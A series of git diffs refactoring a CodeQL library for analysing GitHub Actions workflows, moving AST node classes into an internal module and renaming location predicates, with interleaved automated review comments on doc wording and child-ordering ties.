diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 21d4f052e13..1f4794ae9bc 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -68,21 +68,25 @@ class ExpressionNode extends AstNode, TExpressionNode { Job getJob() { result.getAChildNode*() = n } + /** + * Gets the length of each line in the StringValue . + */ int lineLength(int idx) { exists(string line | line = n.getValue().splitAt("\n", idx) and result = line.length() + 1) } - bindingset[i] - int unboundPartialLineLengthSum(int i) { + /** + * Gets the sum of the length of the lines up to the given index. + */ + int partialLineLengthSum(int i) { + i in [0 .. count(n.getValue().splitAt("\n"))] and result = sum(int j, int length | j in [0 .. i] and length = this.lineLength(j) | length) } - int partialLineLengthSum(int i) { - i in [0 .. count(n.getValue().splitAt("\n"))] and - result = this.unboundPartialLineLengthSum(i) - } - - predicate expressionOffsets(int sl, int sc, int el, int ec) { + /** + * Gets the absolute coordinates of the expression. + */ + predicate expressionLocation(int sl, int sc, int el, int ec) { exists(int lineDiff, string style, Location loc | loc = n.asYamlNode().getLocation() and lineDiff = loc.getEndLine() - loc.getStartLine() and @@ -164,7 +168,7 @@ class ExpressionNode extends AstNode, TExpressionNode { predicate hasLocationInfo(string path, int sl, int sc, int el, int ec) { path = n.asYamlNode().getFile().getAbsolutePath() and - this.expressionOffsets(sl, sc, el, ec) + this.expressionLocation(sl, sc, el, ec) } override File getFile() { result = n.asYamlNode().getFile() } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 0972ae50039..8cd640ace09 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll 
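Review bot: The QLDoc added in the `@@ -68,21 +68,25 @@` hunk of Ast.qll does not match what the members do. `lineLength(int idx)` returns `line.length() + 1` for the single line at `idx`, so its comment would read better as `Gets the length of the line at index idx of the string value, plus one (presumably for the line break).`; `expressionLocation` is a predicate with no result, so `Holds if the expression spans from line sl, column sc to line el, column ec.` fits it better than "Gets ...". Separately, the bound `i in [0 .. count(n.getValue().splitAt("\n"))]` that now sits in `partialLineLengthSum` looks like it counts distinct line values rather than lines, which would make the range too short for scripts with repeated lines such as blank ones. That is worth confirming, because these sums decide where an expression-injection alert is reported. The body of `expressionLocation` continues outside the hunk.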
@@ -274,10 +274,13 @@ private class RunTree extends StandardPreOrderTree instanceof Run { private class StringValueTree extends StandardPreOrderTree instanceof StringValue { override ControlFlowTree getChildNode(int i) { result = - rank[i](ExpressionNode child, int sl, int el, int sc, int ec, string path | - child = super.getAChildNode() and child.hasLocationInfo(path, sl, sc, el, ec) + rank[i](ExpressionNode child, Location l | + child = super.getAChildNode() and + l = child.getLocation() | - child order by sl, sc, ec, el, child.toString() + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() ) } } From 9b97dbd870a8aa386082b21893e1d372e5ecf95b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 12 Mar 2024 10:16:43 +0100 Subject: [PATCH 0089/1267] Refactor ast nodes --- ql/lib/codeql/Locations.qll | 4 +- ql/lib/codeql/actions/Ast.qll | 905 ++------------- ql/lib/codeql/actions/ast/internal/Ast.qll | 1001 +++++++++++++++++ .../actions/controlflow/internal/Cfg.qll | 19 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 2 +- ql/lib/ext/actions_github-script.model.yml | 3 - ql/src/Debug/partial.ql | 2 +- .../Security/CWE-020/CompositeActionsSinks.ql | 2 +- .../CWE-020/ReusableWorkflowsSinks.ql | 2 +- .../CWE-094/CriticalExpressionInjection.ql | 4 +- .../Security/CWE-094/ExpressionInjection.ql | 4 +- ql/src/Security/CWE-829/UntrustedCheckout.ql | 7 +- ql/test/library-tests/test.expected | 427 +++---- ql/test/library-tests/test.ql | 29 +- 15 files changed, 1286 insertions(+), 1127 deletions(-) create mode 100644 ql/lib/codeql/actions/ast/internal/Ast.qll diff --git a/ql/lib/codeql/Locations.qll b/ql/lib/codeql/Locations.qll index 33a8eba30ac..96b5d45f18e 100644 --- a/ql/lib/codeql/Locations.qll +++ b/ql/lib/codeql/Locations.qll 
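Review bot: In `StringValueTree.getChildNode` the `rank` orders children by `l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine()`, and for several scalar styles that key cannot tell siblings apart. The `expressionLocation` predicate in Ast.qll gives every expression in a multi-line quoted or `>` folded value the whole scalar's start and end, so those siblings tie on location and are ordered by `child.toString()`, i.e. by expression text rather than by position in the script. If the control-flow order is meant to follow the script, a tie-breaker based on the expression's offset within the scalar would have to come before `child.toString()`; no accessor for that offset is visible here, so one may need to be added. Until then I would add a comment above the `order by`, such as `// expressions in multi-line quoted or folded scalars share one location; ties are ordered by text`.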
@@ -1,7 +1,7 @@ /** Provides classes for working with locations. */ import files.FileSystem -import codeql.actions.Ast +import codeql.actions.ast.internal.Ast bindingset[loc] pragma[inline_late] @@ -19,7 +19,7 @@ newtype TLocation = locations_default(_, file, startline, startcolumn, endline, endcolumn) ) or - exists(ExpressionNode e | + exists(ExpressionImpl e | e.hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) ) or diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 1f4794ae9bc..2bfedd623f5 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -1,933 +1,232 @@ -private import codeql.actions.ast.internal.Yaml +private import codeql.actions.ast.internal.Ast private import codeql.Locations -newtype TAstNode = - TWorflowNode(YamlNode n) or - TExpressionNode(StringValue n, string expression, int exprOffset) { - expression = getASimpleReferenceExpression(n, exprOffset) - } +class AstNode instanceof AstNodeImpl { + AstNode getAChildNode() { result = super.getAChildNode() } -class AstNode extends TAstNode { - abstract AstNode getAChildNode(); + AstNode getParentNode() { result = super.getParentNode() } - abstract AstNode getParentNode(); + string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } - abstract string getAPrimaryQlClass(); + Location getLocation() { result = super.getLocation() } - abstract string toString(); + string toString() { result = super.toString() } - abstract Location getLocation(); + Job getEnclosingJob() { result = super.getEnclosingJob() } - abstract File getFile(); + Workflow getEnclosingWorkflow() { result = super.getEnclosingWorkflow() } - /** - * Gets the enclosing workflow statement. - */ - Workflow getEnclosingWorkflow() { this = result.getAChildNode*() } - - /** - * Gets a environment variable expression by name in the scope of the current node. 
- */ - ExpressionNode getInScopeEnvVarExpr(string name) { - exists(StringValue l, Env env | - env.asYamlMapping().maps(any(YamlScalar s | s.getValue() = name), l.asYamlNode()) and - l.getAnExpression() = result - | - env.(StepEnv).getStep().getAChildNode*() = this - or - env.(JobEnv).getJob().getAChildNode*() = this - or - env.(WorkflowEnv).getWorkflow().getAChildNode*() = this - ) - } + Expression getInScopeEnvVarExpr(string name) { result = super.getInScopeEnvVarExpr(name) } } -class ExpressionNode extends AstNode, TExpressionNode { - StringValue n; - string rawExpression; +class ScalarValue extends AstNode instanceof ScalarValueImpl { } + +class Expression extends AstNode instanceof ExpressionImpl { string expression; - int exprOffset; + string rawExpression; - ExpressionNode() { - this = TExpressionNode(n, rawExpression, exprOffset - 1) and - expression = - rawExpression.regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) + Expression() { + expression = this.getExpression() and + rawExpression = this.getRawExpression() } - override string toString() { result = expression } - - override AstNode getAChildNode() { none() } - - override AstNode getParentNode() { result = n } - - override string getAPrimaryQlClass() { result = "ExpressionNode" } - string getExpression() { result = expression } string getRawExpression() { result = rawExpression } - - Job getJob() { result.getAChildNode*() = n } - - /** - * Gets the length of each line in the StringValue . - */ - int lineLength(int idx) { - exists(string line | line = n.getValue().splitAt("\n", idx) and result = line.length() + 1) - } - - /** - * Gets the sum of the length of the lines up to the given index. - */ - int partialLineLengthSum(int i) { - i in [0 .. count(n.getValue().splitAt("\n"))] and - result = sum(int j, int length | j in [0 .. i] and length = this.lineLength(j) | length) - } - - /** - * Gets the absolute coordinates of the expression. 
- */ - predicate expressionLocation(int sl, int sc, int el, int ec) { - exists(int lineDiff, string style, Location loc | - loc = n.asYamlNode().getLocation() and - lineDiff = loc.getEndLine() - loc.getStartLine() and - style = n.asYamlNode().(YamlString).getStyle() - | - // eg: - // - run: echo "hello" - // - run: 'echo "hello"' - // - run: "echo 'hello'" - style = ["", "\"", "'"] and - lineDiff = 0 and - sl = loc.getStartLine() and - el = sl and - sc = loc.getStartColumn() + exprOffset and - ec = sc + rawExpression.length() - 1 - or - // eg: - // - run: "echo 'hello' - // echo 'hello'" - // - run: "echo 'hello' - // echo 'hello' - // echo 'hello'" - style = ["", "\"", "'"] and - lineDiff > 0 and - sl = loc.getStartLine() and - el = loc.getEndLine() and - sc = loc.getStartColumn() and - ec = loc.getEndColumn() - or - // eg: - // - run: | - // echo "hello" - // - run: | - // echo "hello" - // echo "bye" - style = "|" and - exists(int r | - ( - r > 0 and - this.partialLineLengthSum(r - 1) < exprOffset and - this.partialLineLengthSum(r) >= exprOffset and - sl = loc.getStartLine() + r + 1 and - el = sl and - sc = - n.getKeyNode().getLocation().getStartColumn() + exprOffset - - this.partialLineLengthSum(r - 1) + 2 - 1 and - ec = sc + rawExpression.length() - 1 - or - r = 0 and - this.partialLineLengthSum(r) > exprOffset and - sl = loc.getStartLine() + r + 1 and - el = sl and - sc = n.getKeyNode().getLocation().getStartColumn() + 2 + exprOffset and - ec = sc + rawExpression.length() - 1 - ) - ) - or - // eg: - // - run: > - // echo "hello" - // - run: > - // echo "hello" - // echo "hello" - style = ">" and - sl = loc.getStartLine() + 1 and - el = loc.getEndLine() and - sc = n.getKeyNode().getLocation().getStartColumn() and - ec = loc.getEndColumn() - ) - } - - override Location getLocation() { - exists(Location loc | - this.hasLocationInfo(loc.getFile().getAbsolutePath(), loc.getStartLine(), - loc.getStartColumn(), loc.getEndLine(), loc.getEndColumn()) and - result = 
loc - ) - } - - predicate hasLocationInfo(string path, int sl, int sc, int el, int ec) { - path = n.asYamlNode().getFile().getAbsolutePath() and - this.expressionLocation(sl, sc, el, ec) - } - - override File getFile() { result = n.asYamlNode().getFile() } -} - -/** - * Base class for the AST tree. Based on YamlNode from the Yaml library. - */ -class WorkflowNode extends AstNode, TWorflowNode { - YamlNode n; - - WorkflowNode() { this = TWorflowNode(n) } - - override AstNode getParentNode() { result = TWorflowNode(n.getParentNode()) } - - override AstNode getAChildNode() { - result = TWorflowNode(n.getAChildNode()) - or - exists(ExpressionNode e | e.getParentNode() = this | result = e) - } - - override string getAPrimaryQlClass() { result = n.getAPrimaryQlClass() } - - override Location getLocation() { result = n.getLocation() } - - override File getFile() { result = n.getFile() } - - YamlNode asYamlNode() { result = n } - - YamlMapping asYamlMapping() { result = n } - - override string toString() { result = n.toString() } } /** A common class for `env` in workflow, job or step. */ -abstract class Env extends WorkflowNode { } +abstract class Env extends AstNode instanceof EnvImpl { + /** Gets an environment variable value given its name. */ + ScalarValueImpl getEnvVarValue(string name) { result = super.getEnvVarValue(name) } -/** A workflow level `env` mapping. */ -class WorkflowEnv extends Env { - Workflow workflow; + /** Gets an environment variable value. */ + ScalarValueImpl getAnEnvVarValue() { result = super.getAnEnvVarValue() } - WorkflowEnv() { - n instanceof YamlMapping and - workflow.asYamlMapping().lookup("env") = this.asYamlNode() - } + /** Gets an environment variable expressin given its name. */ + ExpressionImpl getEnvVarExpr(string name) { result = super.getEnvVarExpr(name) } - /** Gets the workflow this field belongs to. */ - Workflow getWorkflow() { result = workflow } -} - -/** A job level `env` mapping. 
*/ -class JobEnv extends Env { - Job job; - - JobEnv() { job.asYamlMapping().lookup("env") = this.asYamlNode() } - - /** Gets the job this field belongs to. */ - Job getJob() { result = job } -} - -/** A step level `env` mapping. */ -class StepEnv extends Env { - Step step; - - StepEnv() { step.asYamlMapping().lookup("env") = this.asYamlNode() } - - /** Gets the step this field belongs to. */ - Step getStep() { result = step } + /** Gets an environment variable expression. */ + ExpressionImpl getAnEnvVarExpr() { result = super.getAnEnvVarExpr() } } /** * A custom composite action. This is a mapping at the top level of an Actions YAML action file. * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions. */ -class CompositeAction extends WorkflowNode { - //class CompositeAction extends WorkflowNode, YamlDocument, YamlMapping { - CompositeAction() { - n instanceof YamlDocument and - n instanceof YamlMapping and - this.getFile().getBaseName() = ["action.yml", "action.yaml"] and - this.asYamlMapping().lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = - "composite" - } +class CompositeAction extends AstNode instanceof CompositeActionImpl { + Runs getRuns() { result = super.getRuns() } - /** Gets the `runs` mapping. 
*/ - Runs getRuns() { result.asYamlNode() = this.asYamlMapping().lookup("runs") } + Outputs getOutputs() { result = super.getOutputs() } - Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } - ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } - ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + Input getAnInput() { result = super.getAnInput() } - Input getAnInput() { - this.asYamlMapping().lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) - } - - Input getInput(string name) { - this.asYamlMapping().lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) and - result.asYamlNode().(YamlString).getValue() = name - } + Input getInput(string inputName) { result = super.getInput(inputName) } } /** * An `runs` mapping in a custom composite action YAML. * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs */ -class Runs extends WorkflowNode { - CompositeAction action; +class Runs extends AstNode instanceof RunsImpl { + CompositeAction getAction() { result = super.getAction() } - Runs() { - n instanceof YamlMapping and - action.asYamlMapping().lookup("runs") = this.asYamlNode() - } + Step getAStep() { result = super.getAStep() } - /** Gets the action that this `runs` mapping is in. */ - CompositeAction getAction() { result = action } - - /** Gets any steps that are defined within this job. */ - Step getAStep() { - result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(_) - } - - /** Gets the step at the given index within this job. 
*/ - Step getStep(int i) { - result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(i) - } + Step getStep(int i) { result = super.getStep(i) } } /** * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. */ -class Workflow extends WorkflowNode { - Workflow() { n instanceof YamlDocument and n instanceof YamlMapping } +class Workflow extends AstNode instanceof WorkflowImpl { + Env getEnv() { result = super.getEnv() } - /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ - YamlMapping getJobs() { result = this.asYamlMapping().lookup("jobs") } + string getName() { result = super.getName() } - /** Gets the 'global' `env` mapping in this workflow. */ - WorkflowEnv getEnv() { result.asYamlNode() = this.asYamlMapping().lookup("env") } + Job getAJob() { result = super.getAJob() } - /** Gets the name of the workflow. */ - string getName() { result = this.asYamlMapping().lookup("name").(YamlString).getValue() } + Job getJob(string jobId) { result = super.getJob(jobId) } - /** Gets the job within this workflow with the given job ID. 
*/ - Job getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } + predicate hasTriggerEvent(string trigger) { super.hasTriggerEvent(trigger) } - /** Gets a job within this workflow */ - Job getAJob() { result = this.getJob(_) } + string getATriggerEvent() { result = super.getATriggerEvent() } - predicate hasTriggerEvent(string trigger) { - exists(YamlNode y | - y = this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode(trigger) - ) - } + Permissions getPermissions() { result = super.getPermissions() } - string getATriggerEvent() { - exists(YamlNode y | y = this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode(result)) - } - - Permissions getPermissions() { result.asYamlNode() = this.asYamlMapping().lookup("permissions") } - - Strategy getStrategy() { result.asYamlNode() = this.asYamlMapping().lookup("strategy") } + Strategy getStrategy() { result = super.getStrategy() } } -class ReusableWorkflow extends Workflow { - YamlValue workflow_call; +class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { + Outputs getOutputs() { result = super.getOutputs() } - ReusableWorkflow() { - n instanceof YamlMapping and - this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode("workflow_call") = workflow_call - } + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } - Outputs getOutputs() { result.asYamlNode() = workflow_call.(YamlMapping).lookup("outputs") } + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } - ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + Input getAnInput() { result = super.getAnInput() } - ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } - - Input getAnInput() { - workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) - } - - Input getInput(string name) { - 
workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) and - result.asYamlNode().(YamlString).getValue() = name - } + Input getInput(string inputName) { result = super.getInput(inputName) } } -class Input extends WorkflowNode { - YamlMapping parent; +class Input extends AstNode instanceof InputImpl { } - Input() { parent.lookup("inputs").(YamlMapping).maps(this.asYamlNode(), _) } -} +class Outputs extends AstNode instanceof OutputsImpl { + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } -class Outputs extends WorkflowNode { - YamlMapping parent; - - Outputs() { - n instanceof YamlMapping and - parent.lookup("outputs") = this.asYamlNode() - } - - /** - * Gets an output expression. - */ - ExpressionNode getAnOutputExpr() { result = this.getOutputExpr(_) } - - /** - * Gets a specific output expression by name. - */ - ExpressionNode getOutputExpr(string name) { - exists(StringValue l | - l.getAnExpression() = result and - ( - this.asYamlMapping().lookup(name).(YamlMapping).lookup("value") = l.asYamlNode() or - this.asYamlMapping().lookup(name) = l.asYamlNode() - ) - ) - } - - string getAnOutputName() { - this.asYamlMapping().maps(any(YamlString s | s.getValue() = result), _) - } + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } + // TODO: REMOVE override string toString() { result = "Job outputs node" } } -class Permissions extends WorkflowNode { - YamlMapping parent; +class Permissions extends AstNode instanceof PermissionsImpl { } - Permissions() { - n instanceof YamlMapping and - parent.lookup("permissions") = this.asYamlNode() - } -} +class Strategy extends AstNode instanceof StrategyImpl { + Expression getMatrixVarExpr(string varName) { result = super.getMatrixVarExpr(varName) } -class Strategy extends WorkflowNode { - YamlMapping parent; - - Strategy() { - n instanceof YamlMapping and - parent.lookup("strategy") = this.asYamlNode() - } - - /** - * Gets a specific matric 
expression (YamlMapping) by name. - */ - StringValue getMatrixVar(string name) { - this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(name) = result.asYamlNode() - } - - /** - * Gets a specific matric expression (YamlMapping) by name. - */ - StringValue getAMatrixVar() { - this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(_) = result.asYamlNode() - } + Expression getAMatrixVarExpr() { result = super.getAMatrixVarExpr() } } /** * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds */ -class Needs extends WorkflowNode { - Job job; - - Needs() { - n instanceof YamlMappingLikeNode and - job.asYamlMapping().lookup("needs") = this.asYamlNode() - } - - Job getJob() { result = job } - - Job getANeededJob() { - result.getId() = this.asYamlNode().(YamlMappingLikeNode).getNode(_).(YamlString).getValue() and - result.getFile() = job.getFile() - } +class Needs extends AstNode instanceof NeedsImpl { + Job getANeededJob() { result = super.getANeededJob() } } /** * An Actions job within a workflow. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. */ -class Job extends WorkflowNode { - string jobId; - Workflow workflow; +abstract class Job extends AstNode instanceof JobImpl { + string getId() { result = super.getId() } - Job() { - n instanceof YamlMapping and - this.asYamlNode() = workflow.getJobs().lookup(jobId) - } + Workflow getWorkflow() { result = super.getWorkflow() } - /** - * Gets the ID of this job, as a string. - * This is the job's key within the `jobs` mapping. - */ - string getId() { result = jobId } + Job getANeededJob() { result = super.getANeededJob() } - /** Gets any steps that are defined within this job. */ - Step getAStep() { - result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(_) - } + Outputs getOutputs() { result = super.getOutputs() } - /** Gets the step at the given index within this job. 
*/ - Step getStep(int i) { - result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(i) - } + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } - /** Gets the workflow this job belongs to. */ - Workflow getWorkflow() { result = workflow } + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } - /** - * Gets a needed job. - * eg: - * - needs: [job1, job2] - */ - Job getANeededJob() { - exists(Needs needs | - needs.getJob() = this and - result = needs.getANeededJob() - ) - } + Env getEnv() { result = super.getEnv() } - /** - * Gets the declaration of the outputs for the job. - * eg: - * out1: ${steps.foo.bar} - * out2: ${steps.foo.baz} - */ - Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } + If getIf() { result = super.getIf() } - ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + Permissions getPermissions() { result = super.getPermissions() } - ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + Strategy getStrategy() { result = super.getStrategy() } +} - /** - * Reusable workflow jobs may have Uses children - * eg: - * call-job: - * uses: ./.github/workflows/reusable_workflow.yml - * with: - * arg1: value1 - */ - UsesJob getUses() { result.getJob() = this } +class LocalJob extends Job instanceof LocalJobImpl { + Step getAStep() { result = super.getAStep() } - predicate usesReusableWorkflow() { - this.asYamlMapping().maps(any(YamlString s | s.getValue() = "uses"), _) - } - - If getIf() { result.asYamlNode() = this.asYamlMapping().lookup("if") } - - Permissions getPermissions() { result.asYamlNode() = this.asYamlMapping().lookup("permissions") } - - Strategy getStrategy() { result.asYamlNode() = this.asYamlMapping().lookup("strategy") } - - override string toString() { result = "Job: " + jobId } + Step getStep(int i) { result = super.getStep(i) } } /** * A step within an 
Actions job. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. */ -class Step extends WorkflowNode { - YamlMapping parent; +class Step extends AstNode instanceof StepImpl { + string getId() { result = super.getId() } - Step() { parent.lookup("steps").(YamlSequence).getElementNode(_) = this.asYamlNode() } + Env getEnv() { result = super.getEnv() } - /** Gets the ID of this step, if any. */ - string getId() { result = this.asYamlMapping().lookup("id").(YamlString).getValue() } - - /** Gets the `job` this step belongs to, if the step belongs to a `job` in a workflow. Has no result if the step belongs to `runs` in a custom composite action. */ - Job getJob() { result.asYamlNode() = parent } - - /** Gets the value of the `if` field in this step, if any. */ - If getIf() { result.asYamlNode() = this.asYamlMapping().lookup("if") } + If getIf() { result = super.getIf() } } /** * An If node representing a conditional statement. */ -class If extends WorkflowNode { - WorkflowNode parent; - - If() { - (parent instanceof Step or parent instanceof Job) and - parent.asYamlMapping().lookup("if") = this.asYamlNode() - } - - WorkflowNode getEnclosingNode() { result = parent } - - string getCondition() { result = this.asYamlNode().(YamlScalar).getValue() } +class If extends AstNode instanceof IfImpl { + string getCondition() { result = super.getCondition() } } -/** - * Abstract class representing a call to a 3rd party action or reusable workflow. 
- */ -abstract class Uses extends WorkflowNode { - abstract string getCallee(); +abstract class Uses extends AstNode instanceof UsesImpl { + string getCallee() { result = super.getCallee() } - abstract string getVersion(); + string getVersion() { result = super.getVersion() } - abstract ExpressionNode getArgumentExpr(string key); - - override string toString() { result = "Uses Step" } + Expression getArgumentExpr(string argName) { result = super.getArgumentExpr(argName) } } -/** - * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. - * The capture groups are: - * 1: The owner of the repository where the Action comes from, e.g. `actions` in `actions/checkout@v2` - * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`. - * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. - */ -private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } +class UsesStep extends Step, Uses instanceof UsesStepImpl { } -/** - * A Uses step represents a call to an action that is defined in a GitHub repository. - */ -class UsesStep extends Step, Uses { - YamlScalar uses; - - UsesStep() { this.asYamlMapping().maps(any(YamlScalar s | s.getValue() = "uses"), uses) } - - /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ - override string getCallee() { - result = - ( - uses.getValue().regexpCapture(usesParser(), 1) + "/" + - uses.getValue().regexpCapture(usesParser(), 2) - ).toLowerCase() - } - - /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. 
*/ - override string getVersion() { result = uses.getValue().regexpCapture(usesParser(), 3) } - - override Expression getArgumentExpr(string key) { - exists(StringValue l | - l.asYamlNode() = this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) and - result = l.getAnExpression() - ) - } - - override string toString() { - if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" - } -} - -/** - * A Uses step represents a call to an action that is defined in a GitHub repository. - */ -class UsesJob extends Uses { - UsesJob() { - this instanceof Job and - this.asYamlMapping().maps(any(YamlString s | s.getValue() = "uses"), _) - } - - Job getJob() { result = this } - - /** - * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. - * local repo: octo-org/this-repo/.github/workflows/workflow-1.yml@172239021f7ba04fe7327647b213799853a9eb89 - * local repo: ./.github/workflows/workflow-2.yml - * remote repo: octo-org/another-repo/.github/workflows/workflow.yml@v1 - */ - private string repoUsesParser() { result = "([^/]+)/([^/]+)/([^@]+)@(.+)" } - - private string pathUsesParser() { result = "\\./(.+)" } - - override string getCallee() { - exists(YamlString name | - this.asYamlMapping().lookup("uses") = name and - if name.getValue().matches("./%") - then result = name.getValue().regexpCapture(this.pathUsesParser(), 1) - else - result = - name.getValue().regexpCapture(this.repoUsesParser(), 1) + "/" + - name.getValue().regexpCapture(this.repoUsesParser(), 2) + "/" + - name.getValue().regexpCapture(this.repoUsesParser(), 3) - ) - } - - /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. 
*/ - override string getVersion() { - exists(YamlString name | - this.asYamlMapping().lookup("uses") = name and - if not name.getValue().matches("\\.%") - then result = name.getValue().regexpCapture(this.repoUsesParser(), 4) - else none() - ) - } - - override ExpressionNode getArgumentExpr(string key) { - exists(StringValue l | - this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) = l.asYamlNode() and - result = l.getAnExpression() - ) - } -} +class ExternalJob extends Job, Uses instanceof ExternalJobImpl { } /** * A `run` field within an Actions job step, which runs command-line programs using an operating system shell. * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. */ -class Run extends Step { - StringValue script; +class Run extends Step instanceof RunImpl { + string getScript() { result = super.getScript() } - Run() { this.asYamlMapping().maps(any(YamlString s | s.getValue() = "run"), script.asYamlNode()) } - - StringValue getScript() { result = script } - - override string toString() { - if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" - } + Expression getAnScriptExpr() { result = super.getAnScriptExpr() } } -/** - * A YamlString part of a YamlSequence or YamlMapping values. 
- */ -class StringValue extends WorkflowNode { - YamlNode keyNode; +abstract class ContextExpression extends AstNode instanceof ContextExpressionImpl { + string getFieldName() { result = super.getFieldName() } - StringValue() { - n instanceof YamlString and - exists(YamlCollection c | - c = keyNode and - ( - c instanceof YamlMapping and - //c.(YamlMapping).maps(_, this.asYamlNode()) - exists(int i | this.asYamlNode() = c.(YamlMapping).getValueNode(i)) - or - c instanceof YamlSequence and - c.(YamlSequence).getElementNode(_) = this.asYamlNode() - ) - ) - } - - string getValue() { result = this.asYamlNode().(YamlString).getValue() } - - YamlNode getKeyNode() { result = keyNode } - - ExpressionNode getAnExpression() { result = this.getAChildNode() } + AstNode getTarget() { result = super.getTarget() } } -/** - * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. - * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. - * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. - * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} - */ -string getASimpleReferenceExpression(StringValue node, int offset) { - // We use `regexpFind` to obtain *all* matches of `${{...}}`, - // not just the last (greedy match) or first (reluctant match). 
- result = - node.getValue() - .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset) - .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1) -} +class StepsExpression extends ContextExpression instanceof StepsExpressionImpl { } -class Expression extends ExpressionNode { } +class NeedsExpression extends ContextExpression instanceof NeedsExpressionImpl { } -/** - * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. - * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability - */ -class ContextExpression extends Expression { - ContextExpression() { - expression - .regexpMatch([ - stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), - matrixCtxRegex() - ]) - } +class JobsExpression extends ContextExpression instanceof JobsExpressionImpl { } - abstract string getFieldName(); +class InputsExpression extends ContextExpression instanceof InputsExpressionImpl { } - abstract AstNode getTarget(); -} +class EnvExpression extends ContextExpression instanceof EnvExpressionImpl { } -private string 